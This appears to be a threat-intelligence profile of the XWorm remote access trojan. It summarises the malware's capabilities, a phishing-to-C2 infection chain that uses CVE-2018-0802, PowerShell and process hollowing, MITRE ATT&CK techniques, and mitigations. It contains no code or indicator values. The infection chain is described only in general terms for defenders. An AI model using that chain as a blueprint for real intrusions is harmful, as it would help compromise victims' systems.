XWorm

Start Date:

Most Recent Activity:

Executive Summary

XWorm is a .NET-based remote access trojan (RAT) commonly delivered through phishing campaigns and multi-stage infection chains. It enables remote control, credential theft, payload execution, and command-and-control (C2) communications, often leveraging fileless execution and process injection techniques.

---

Overview

Description

Type: Remote Access Trojan (RAT) / Commodity Malware

Delivery:
Phishing emails with malicious Office documents, embedded OLE objects, exploit-assisted chains

Capabilities:
Remote control, payload execution, credential theft, persistence, process injection/hollowing, C2 communication

Notable Characteristics:
Frequently delivered via phishing campaigns using Office exploits such as CVE-2018-0802, followed by PowerShell execution, fileless .NET loaders, and process hollowing to evade detection before establishing C2 communication.

---

Attack Flow

Flow

Phishing Email → Excel Attachment → OLE Object → CVE-2018-0802 / HTA → PowerShell → .NET Loader → XWorm Payload → Process Hollowing → C2

• Victim receives phishing email with malicious Office attachment
• Embedded OLE object or exploit triggers execution
• HTA file retrieved via CVE-2018-0802 or similar exploit
• PowerShell executes next-stage payload
• Fileless .NET loader retrieves XWorm
• Process hollowing or injection performed
• XWorm executes and connects to C2 infrastructure

---

MITRE ATT&CK Techniques

MITRE ATT&CK

• T1055 – Process Injection
• T1070.004 – Indicator Removal - File Deletion
• T1053.005 – Scheduled Task/Job - Scheduled Task
• T1204.002 – User Execution - Malicious File
• T1566.001 – Phishing - Spearphishing Attachment
• T1059.001 – Command and Scripting Interpreter - PowerShell
• T1027 – Obfuscated Files or Information
• T1562 – Impair Defenses
• T1136 – Create Account

---

Mitigations

Mitigations

• Identity Protections: Enforce MFA, monitor suspicious account creation, restrict unauthorized access
• Endpoint Controls: Block Office child-process execution, restrict PowerShell abuse, monitor injection behavior
• Network Monitoring: Detect anomalous outbound traffic and staged payload retrieval
• User Awareness: Train users to identify phishing emails and malicious attachments

---

Detections

Indicators of Compromise (IOCs)

• URLs
• Files
• Domains
• IPs
• SHA1
• SHA256
• MD5

Detection Rules

Rule	View	Download
YARA	N/A	N/A
Sigma	N/A	N/A
Suricata	N/A	N/A
SPL	N/A	N/A

---

Research & References

References

• https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla